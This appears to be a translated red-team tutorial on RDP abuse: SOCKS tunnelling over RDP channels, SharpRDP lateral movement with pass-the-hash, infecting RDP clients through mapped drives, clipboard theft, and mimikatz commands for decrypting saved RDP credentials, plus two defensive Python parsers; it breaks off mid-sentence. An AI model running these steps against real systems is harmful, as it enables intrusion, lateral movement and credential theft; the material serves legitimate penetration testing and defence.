
Title: Utilization of RDP protocol in Red and Blue Confrontation


1 SocksOverRDP

1.1 Tool introduction

When the firewall only lets TCP/UDP port 3389 through, a SOCKS channel can still be built over the RDP protocol. The scenario is fairly narrow.


Tool address: https://github.com/nccgroup/SocksOverRDP

This tool implements a SOCKS proxy on top of the RDP protocol, much like the -D option of SSH: once the RDP session is connected, the proxy runs inside that session.

The tool consists of two parts:

SocksOverRDP-Plugin.dll: registered on the client and loaded into the Remote Desktop client's process each time it runs.

SocksOverRDP-Server.exe: the server-side component, copied to the server and executed. No installation and no configuration required.

When the .exe runs on the server side of the Remote Desktop session, it connects back to the client through a dynamic virtual channel (a feature of the RDP protocol) and starts the SOCKS proxy on the client. The proxy listens on 127.0.0.1:1080 by default and can be configured as the proxy in a browser or other tool.

Note: the server-side program needs no special privileges on the server; a low-privileged user can also open the virtual channel and the proxy over the connection.

1.2 Tool test

1.2.1 Client

The .dll can be placed in any directory on the client machine. For convenience it can be copied into %SYSROOT%\system32\ or %SYSROOT%\SysWoW64\.

Use the following command to install and register the DLL:

regsvr32.exe SocksOverRDP-Plugin.dll

Unregister:

regsvr32.exe /u SocksOverRDP-Plugin.dll

When mstsc.exe starts on the RDP client, the following prompt appears:

[Screenshot: plugin prompt shown when mstsc.exe starts]

1.2.2 Server

Run it directly: SocksOverRDP-Server.exe

2 RDP to TCP

The scenario is the same: because of the firewall rules, only the Remote Desktop of a single Windows server can be reached. How can that Windows server be used as a pivot into the intranet?

2.1 Tool introduction

Tool address: https://github.com/V-E-O/rdp2tcp

Principle: multiplex TCP connections over an RDP virtual channel

Available features:

Forward TCP port forwarding

Reverse TCP port forwarding

Forwarding of a process's standard input/output

SOCKS5 proxy

2.2 Tool test

2.2.1 Download and build rdp2tcp

Install mingw-w64

apt-get install mingw-w64

Download rdp2tcp

git clone https://github.com/V-E-O/rdp2tcp.git

Modify the build configuration

By default rdp2tcp does not build a 64-bit exe, so the build configuration has to be changed to add a 64-bit target.

Edit the top-level Makefile so that it reads as follows (recipe lines are indented with a tab; the 32-bit targets are commented out):

all: client server-mingw64

client: client/rdp2tcp

client/rdp2tcp:
	make -C client

#server-mingw32: server/rdp2tcp.exe
#server/rdp2tcp.exe:
#	make -C server -f Makefile.mingw32

server-mingw64: server/rdp2tcp64.exe

server/rdp2tcp64.exe:
	make -C server -f Makefile.mingw64

clean:
	make -C client clean
	#make -C server -f Makefile.mingw32 clean
	make -C server -f Makefile.mingw64 clean
	make -C tools clean

Create a new file server/Makefile.mingw64 with the following content (recipe lines are indented with a tab):

BIN=rdp2tcp64.exe
# 64-bit MinGW cross compiler; i686-w64-mingw32-gcc would produce a 32-bit exe
CC=x86_64-w64-mingw32-gcc
CFLAGS=-Wall -g \
	-D_WIN32_WINNT=0x0501 \
	-I./common
# -D_WIN32_WINNT=0x0501
# -D_WIN32_WINNT=0x0501 -DDEBUG
LDFLAGS=-lwtsapi32 -lws2_32

OBJS=./common/iobuf.o \
	./common/print.o \
	./common/msgparser.o \
	./common/nethelper.o \
	./common/netaddr.o \
	errors.o aio.o events.o \
	tunnel.o channel.o process.o commands.o main.o

all: clean_common $(BIN)

clean_common:
	$(MAKE) -C ./common clean

$(BIN): $(OBJS)
	$(CC) -o $@ $(OBJS) $(LDFLAGS)

# $< is the .c file being compiled
%.o: %.c
	$(CC) $(CFLAGS) -o $@ -c $<

clean:
	rm -f $(OBJS) $(BIN)

Build:

make

2.2.2 Connect to the remote desktop with xfreerdp and set up the channel

Run xfreerdp with the rdp2tcp channel add-on enabled (the path points at the client binary built above):

/opt/freerdp-nightly/bin/xfreerdp /v:IP:3389 /u:user /p:passwd /cert-ignore /rdp2tcp:/root/rdp2tcp/client/rdp2tcp

Upload rdp2tcp64.exe to RDP Server and execute (no administrator permission required)

Start rdp2tcp.py on the client system

cd rdp2tcp/tools

python rdp2tcp.py

Add a forward port mapping (local 127.0.0.1:445 to 192.168.112.129:445):

python rdp2tcp.py add forward 127.0.0.1 445 192.168.112.129 445

3 Lateral movement with RDP

3.1 Test

This section describes lateral movement over the RDP protocol without going through the GUI client or a SOCKS proxy.

The mstscax.dll library on Windows exposes the complete RDP client functionality; it is the ActiveX COM library for Microsoft Terminal Services. By leveraging this DLL, testers can build a console application that executes authenticated remote commands over RDP without a GUI client or SOCKS proxy.

Execute in Cobalt Strike:

[Screenshot: SharpRDP run from Cobalt Strike]

Execute the command directly:

SharpRDP.exe computername=dc01 command=calc username=offense\administrator password=123456

There are two authentication methods: supplying plaintext credentials (as above), or using the current user's context through Restricted Admin mode. Restricted Admin mode is a Windows protection mechanism that performs a network-type logon instead of an interactive logon, which is what allows pass-the-hash (PtH) here.

3.2 Scenarios

In some situations RDP is the preferred way to perform lateral movement, but using the traditional RDP client GUI is awkward. The method above hides the command execution inside the RDP protocol.

Secondly, RDP can be used to move laterally to a system where you have no local administrator rights but do have RDP logon rights; BloodHound can be used to collect this information.

[Screenshot omitted]

4 Attacking the RDP client through a mapped drive

Attack approach: monitor for the mapped drive and inject a startup item

4.1 Principle

tsclient is the machine name that appears in the remote computer's network neighbourhood when you connect to it through Remote Desktop; it is the name the remote computer assigns to the local (connecting) machine.

The local machine can be reached from the remote computer via the \\tsclient\<drive letter> path. Access works much like an SMB file transfer. Although it is the SMB protocol underneath, tsclient requires no authentication, so the local machine can be infected in reverse through prepared means.

4.2 Exploitation

The idea behind using tsclient is simple: a malicious program or script is written into the user's Startup folder via this file transfer, and it is executed when the machine restarts.

Tools: https://github.com/mdsecactivebreach/RDPInception/

4.3 Constraints

The C: drive has to be mapped, but mstsc does not share drives by default; it must be enabled manually, as shown in the figure:

[Screenshot: enabling drive sharing in mstsc]

Only the remotely logged-on user can access tsclient; other users on the server cannot, including via runas.

Despite these restrictions, in real environments many operations staff routinely map their drives for convenience, so the method is not useless; it has to be judged case by case. A cruder idea: if the script cannot find the mapped drive, kill rdpclip.exe, which leaves the administrator without a working clipboard and pushes them to remap the drive without knowing why.

Finally, unlike SMB, where a scheduled task launches the uploaded file, the user on the infected machine is unknown here, so execution can only rely on the Startup item. This attack method is therefore less effective against servers.

5 Clipboard abuse

In addition to file transfer, clipboard hijacking can also be tried for a reverse attack.

5.1 Clipboard theft

5.1.1 Principle

When mstsc is used for Remote Desktop, a process called rdpclip.exe is started. Its job is to synchronise the clipboards of the server and the client.

[Screenshot: rdpclip.exe in the process list]

This process is very useful. As mentioned above, if it is killed, copying data on the server (the remote machine) for pasting on the client (the local machine) no longer works: the clipboard appears broken.

Because clipboard contents are synchronised automatically while the process runs, when the target machine has RDP sessions open with other machines via mstsc, clipboard theft can be performed by reading the data in the rdpclip.exe process to collect as much information as possible.

Furthermore, since the process runs in the background, when an administrator is logged on to several servers over Remote Desktop at once and copies something on one of them, the data is synchronised to the rdpclip.exe process on all of them.

5.1.2 Exploitation

Empire ships a Get-ClipboardContents.ps1, which can be loaded from Empire or Cobalt Strike, or you can write a similar script yourself; it is a fairly simple tool.

Note, however, that as with tsclient, reading across different users on the same computer is not possible: each user's rdpclip.exe is started independently.

5.2 Transferring malicious files via the clipboard

When we log on to a server with mstsc and perform a copy on the server, a series of operations is generated.

[Screenshot: events generated by a copy operation]

5.2.1 Principle

In a Remote Desktop session, transferring a file through the clipboard works as follows:

1. On the server, the "Copy" operation creates clipboard data in the CF_HDROP format

2. When "Paste" is executed on the client, a series of events is triggered

3. The rdpclip.exe process on the server is asked to provide the clipboard contents and convert them to the FileGroupDescriptor (Fgd) clipboard format

4. The HdropToFgdConverter::AddItemToFgd() function adds each file's metadata to the descriptor

5. When complete, the Fgd blob is sent to the RDP service on the server

6. The server simply wraps it and sends it to the client

7. The client unpacks it and stores it in its own clipboard

8. The "Paste" event is sent to the current window (for example explorer.exe)

9. The window handles the event and reads the data from the clipboard

10. The file contents are then received over the RDP connection
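The descriptor handed across in steps 3 to 7 is the client's input, so it is worth seeing what a client-side check of it looks like. The Python below is an added example, not code from the post or from the linked projects: it parses a FILEGROUPDESCRIPTORW blob using the Windows FILEDESCRIPTORW layout (592 bytes per entry, the name in a 260-WCHAR cFileName) and applies the check a paste handler should make before writing anything, namely that every file name is a relative path confined to the paste directory. The linked CVE-2019-0887 / mstsc-path-traversal material concerns how the client handles those names, which is why the validation rejects drive letters, UNC roots, leading separators and '..' components. The sample descriptor, the file names in it and the destination directory are constructed; the builder exists only to make the example self-contained.

```python
import struct
from pathlib import PureWindowsPath

MAX_PATH = 260
FILEDESCRIPTORW_SIZE = 592   # 72 bytes of fixed fields + 260 WCHARs of cFileName
_NAME_OFFSET = 72            # dwFlags(4) clsid(16) sizel(8) pointl(8) attrs(4) 3 x FILETIME(24) size hi/lo(8)


def build_fgd(names, size=0, attributes=0x80):
    """Build a FILEGROUPDESCRIPTORW blob; constructed test data, not a capture from rdpclip."""
    blob = struct.pack("<I", len(names))                                    # cItems
    for name in names:
        encoded = name.encode("utf-16-le")
        if len(encoded) > (MAX_PATH - 1) * 2:
            raise ValueError("cFileName is limited to MAX_PATH-1 characters")
        fixed = (struct.pack("<I", 0) + bytes(16) + bytes(8) + bytes(8)    # dwFlags, clsid, sizel, pointl
                 + struct.pack("<I", attributes) + bytes(24)               # dwFileAttributes, 3 x FILETIME
                 + struct.pack("<II", size >> 32, size & 0xFFFFFFFF))     # nFileSizeHigh, nFileSizeLow
        blob += fixed + encoded.ljust(MAX_PATH * 2, b"\x00")               # NUL-padded cFileName
    return blob


def parse_fgd(blob):
    """Return the descriptors as dicts; raises ValueError when cItems promises more than is present."""
    if len(blob) < 4:
        raise ValueError("descriptor too short for cItems")
    (count,) = struct.unpack_from("<I", blob, 0)
    needed = 4 + count * FILEDESCRIPTORW_SIZE
    if len(blob) < needed:
        raise ValueError(f"truncated descriptor: cItems={count} needs {needed} bytes, got {len(blob)}")
    items = []
    for i in range(count):
        off = 4 + i * FILEDESCRIPTORW_SIZE
        attrs = struct.unpack_from("<I", blob, off + 36)[0]
        hi, lo = struct.unpack_from("<II", blob, off + 64)
        raw = blob[off + _NAME_OFFSET: off + _NAME_OFFSET + MAX_PATH * 2]
        name = raw.decode("utf-16-le", errors="replace").split("\x00", 1)[0]   # stop at the NUL terminator
        items.append({"name": name, "attributes": attrs, "size": (hi << 32) | lo})
    return items


def is_safe_relative_name(name):
    """Accept only a relative path that stays inside the paste directory."""
    if not name:
        return False
    p = PureWindowsPath(name)                 # treats both '\\' and '/' as separators
    if p.drive or p.root:                     # 'C:...', '\\\\server\\share', or a leading separator
        return False
    # no parent references, no alternate data streams, no blank components
    return all(part not in ("..", ".") and ":" not in part and part.strip() for part in p.parts)


def safe_paste_targets(blob, dest_dir):
    """Split the descriptor's files into destination paths to write and names to refuse."""
    accepted, rejected = [], []
    for item in parse_fgd(blob):
        if is_safe_relative_name(item["name"]):
            accepted.append(str(PureWindowsPath(dest_dir) / item["name"]))
        else:
            rejected.append(item["name"])
    return accepted, rejected


# Constructed sample: two ordinary names and two that must never be written where they point.
SAMPLE_FGD = build_fgd(["report.docx", "photos\\img1.jpg", "..\\..\\outside.txt", "C:\\Windows\\x.dll"],
                       size=1234)

if __name__ == "__main__":
    ok, bad = safe_paste_targets(SAMPLE_FGD, "C:\\Users\\alice\\Desktop")
    print("write:", ok)
    print("refuse:", bad)
```

Real clipboard traffic adds the RDP clipboard channel's own framing around this descriptor, but the rule for the receiving side is the same: treat every name in it as attacker-controlled and derive the destination path only from validated relative components.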

5.2.2 Exploitation

https://github.com/qianshuidewajueji/CVE-2019-0887

https://github.com/0xedh/mstsc-path-traversal

6 RDP Thief

Each time you successfully connect to a remote host, the RDP client saves the name (or IP address) of the remote host and the username used to log in. When you start mstsc.exe again, you can directly select the name of the remote RDP server from the list, and the client has automatically filled in the username used to log in.

6.1 Retrieving the connection history

The following PowerShell script lists the RDP connection history of the logged-on users from each user's hive under HKEY_USERS:

<#
.SYNOPSIS
This script will list the logged-in users' RDP Connections History.
#>

# Enumerate local accounts; their SIDs name the hives under HKEY_USERS
$AllUser = Get-WmiObject -Class Win32_UserAccount
foreach ($User in $AllUser)
{
    # mstsc keeps one subkey per server it connected to, with a UsernameHint value
    $RegPath = 'Registry::HKEY_USERS\' + $User.SID + '\Software\Microsoft\Terminal Server Client\Servers\'
    Write-Host 'User:' $User.Name
    Write-Host 'SID:' $User.SID
    Write-Host 'Status:' $User.Status
    Try
    {
        # Only users whose hive is currently loaded (logged on) have a key here
        $QueryPath = dir $RegPath -Name -ErrorAction Stop
    }
    Catch
    {
        Write-Host 'No RDP Connections History'
        Write-Host '----------------------------------'
        Continue
    }
    foreach ($Name in $QueryPath)
    {
        Try
        {
            $Hint = (Get-ItemProperty -Path ($RegPath + $Name) -ErrorAction Stop).UsernameHint
            Write-Host 'User:' $Hint
            Write-Host 'Server:' $Name
        }
        Catch
        {
            Write-Host 'No RDP Connections History'
        }
    }
    Write-Host '----------------------------------'
}

[Screenshot: script output]

6.2 Cracking saved RDP credentials

The prerequisite is that the user chose to save the credentials when connecting to the remote host.

Locate the local Credentials files:

dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*

[Screenshot: dir output]

Use mimikatz to parse one of them:

mimikatz dpapi::cred /in:C:\Users\by\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D


**BLOB**

dwVersion : 00000001 - 1

guidProvider : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}

dwMasterKeyVersion : 00000001 - 1

guidMasterKey : {ffc994a1-de8d-4304-9416-31e587f7a8ca}

dwFlags : 20000000 - 536870912 (system ; )

dwDescriptionLen : 00000030 - 48

szDescription : Local Credential Data

algCrypt : 00006610 - 26128 (CALG_AES_256)

dwAlgCryptLen : 00000100 - 256

dwSaltLen : 00000020 - 32

pbSalt : 00fed8ca7ec6d44585dd1fbd8b57e77b6ab0cf318ec5d52d09fd0694ffb89ccb

dwHmacKeyLen : 00000000 - 0

pbHmackKey :

algHash : 0000800e - 32782 (CALG_SHA_512)

dwAlgHashLen : 00000200 - 512

dwHmac2KeyLen : 00000020 - 32

pbHmack2Key : b49ef55f909fa503eda37ddc797c83c99df983920bfb4628e07aac5cb32bb530

dwDataLen : 000000b0 - 176

pbData : 4083f8f501b999a35c4aa57ce732bf52d30a6e604dac5a91b6fd3e65660c52a536025c5126f0d12b85044498deef08a8688b3459f49514ed6ae46271a1cb4cd0e70845d9b6beccbcbe85dead0fb7c80b4f7810add87b75c48592fcbfbbfd94fa4eee8004f8cf6d9619ef4b9af643f4c9ef0e8a2a5b0cd00530a5638cfd114fee4b735ac12eef2c7e6a0364845eb0ee4b3ab121e33324f8d5af48f3422bd47a76ab5e9e9e5a1a383e22fff8bf851b6a2a

dwSignLen : 00000040 - 64

pbSign : 7c8dbe7991c6af4d3bfc9f808790a0904738d0ca227bc2ee20ee26cbf06487dd2679e932b27ea0c0cbbe590ee6430641605d7001b2158c8873c5d6a09a9855a8

What is needed next are guidMasterKey and pbData: pbData is the encrypted credential data, and guidMasterKey is the GUID of the master key that protects it.
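To make the fields in that listing concrete, here is an added Python example (not from the post and not mimikatz code) that parses the DPAPI blob header in exactly the order mimikatz prints it: it reports which master key GUID a blob depends on, the cipher and hash algorithms, and the lengths of the salt, ciphertext and signature, without decrypting anything. From a defender's side that is enough to inventory which saved credentials hang off which master key; turning pbData back into a password still requires that user's master key. The sample blob is constructed: the provider and master key GUIDs, the salt and the HMAC key are the values shown in the listing above, while the ciphertext and signature are filler bytes. A Credentials file on disk carries a short file header in front of the blob; this example takes the bare blob and does not handle that header.

```python
import struct
import uuid

# guidProvider carried by every DPAPI blob (the value in the page's mimikatz output)
DPAPI_PROVIDER_GUID = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")
CRYPTPROTECT_SYSTEM = 0x20000000          # the "system" bit mimikatz prints for dwFlags
ALG_NAMES = {0x6610: "CALG_AES_256", 0x6603: "CALG_3DES",
             0x800E: "CALG_SHA_512", 0x8004: "CALG_SHA1"}


class _Reader:
    """Sequential little-endian reader with bounds checks (a truncated blob raises ValueError)."""

    def __init__(self, data: bytes):
        self.data, self.off = data, 0

    def take(self, n: int) -> bytes:
        if n < 0 or self.off + n > len(self.data):
            raise ValueError(f"truncated DPAPI blob at offset {self.off}")
        chunk = self.data[self.off:self.off + n]
        self.off += n
        return chunk

    def dword(self) -> int:
        return struct.unpack("<I", self.take(4))[0]

    def guid(self) -> uuid.UUID:
        return uuid.UUID(bytes_le=self.take(16))   # GUIDs are stored in mixed-endian (bytes_le) form

    def counted(self) -> bytes:                    # DWORD length followed by that many bytes
        return self.take(self.dword())


def parse_dpapi_blob(blob: bytes) -> dict:
    """Parse the DPAPI blob header fields in the order mimikatz lists them; nothing is decrypted."""
    r = _Reader(blob)
    version = r.dword()
    provider = r.guid()
    if version != 1 or provider != DPAPI_PROVIDER_GUID:
        raise ValueError("not a DPAPI blob (bad dwVersion/guidProvider)")
    mk_version = r.dword()
    mk_guid = r.guid()
    flags = r.dword()
    description = r.counted().decode("utf-16-le", errors="replace").rstrip("\x00\r\n")
    alg_crypt, alg_crypt_len = r.dword(), r.dword()
    salt = r.counted()
    hmac_key = r.counted()
    alg_hash, alg_hash_len = r.dword(), r.dword()
    hmac2_key = r.counted()
    data = r.counted()
    sign = r.counted()
    if r.off != len(blob):
        raise ValueError(f"{len(blob) - r.off} trailing bytes after pbSign")
    return {
        "master_key_version": mk_version,
        "master_key_guid": str(mk_guid),     # names the master key file that can unlock pbData
        "flags": flags,
        "system_flag": bool(flags & CRYPTPROTECT_SYSTEM),
        "description": description,
        "alg_crypt": ALG_NAMES.get(alg_crypt, hex(alg_crypt)),
        "alg_crypt_len": alg_crypt_len,
        "salt": salt.hex(),
        "hmac_key": hmac_key.hex(),
        "alg_hash": ALG_NAMES.get(alg_hash, hex(alg_hash)),
        "alg_hash_len": alg_hash_len,
        "hmac2_key": hmac2_key.hex(),
        "data_len": len(data),
        "sign_len": len(sign),
    }


def build_dpapi_blob(master_key_guid: str, description: str, salt: bytes,
                     hmac2_key: bytes, data: bytes, sign: bytes,
                     flags: int = CRYPTPROTECT_SYSTEM) -> bytes:
    """Assemble a structurally valid blob for testing (constructed data, not a real credential)."""
    def counted(b: bytes) -> bytes:
        return struct.pack("<I", len(b)) + b
    desc = (description + "\x00").encode("utf-16-le")
    return (struct.pack("<I", 1) + DPAPI_PROVIDER_GUID.bytes_le
            + struct.pack("<I", 1) + uuid.UUID(master_key_guid).bytes_le
            + struct.pack("<I", flags) + counted(desc)
            + struct.pack("<II", 0x6610, 256) + counted(salt) + counted(b"")   # AES-256, empty pbHmacKey
            + struct.pack("<II", 0x800E, 512) + counted(hmac2_key)            # SHA-512
            + counted(data) + counted(sign))


# Constructed sample: GUIDs, salt and HMAC key taken from the listing above; the
# ciphertext and signature are filler bytes of the lengths mimikatz reported.
SAMPLE_BLOB = build_dpapi_blob(
    "ffc994a1-de8d-4304-9416-31e587f7a8ca", "Local Credential Data",
    bytes.fromhex("00fed8ca7ec6d44585dd1fbd8b57e77b6ab0cf318ec5d52d09fd0694ffb89ccb"),
    bytes.fromhex("b49ef55f909fa503eda37ddc797c83c99df983920bfb4628e07aac5cb32bb530"),
    bytes(176), bytes(64))

if __name__ == "__main__":
    for key, value in parse_dpapi_blob(SAMPLE_BLOB).items():
        print(f"{key:20} {value}")
```

The master key GUID is the pivot for both sides: it is what the sekurlsa::dpapi step below is matched against, and it is also what an investigator uses to tell which user's master key a recovered blob would need.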

Use sekurlsa::dpapi:

[Screenshot: sekurlsa::dpapi output]

According to the target credentials GUID:{ffc994a1-de8d-4304-9416-31e587
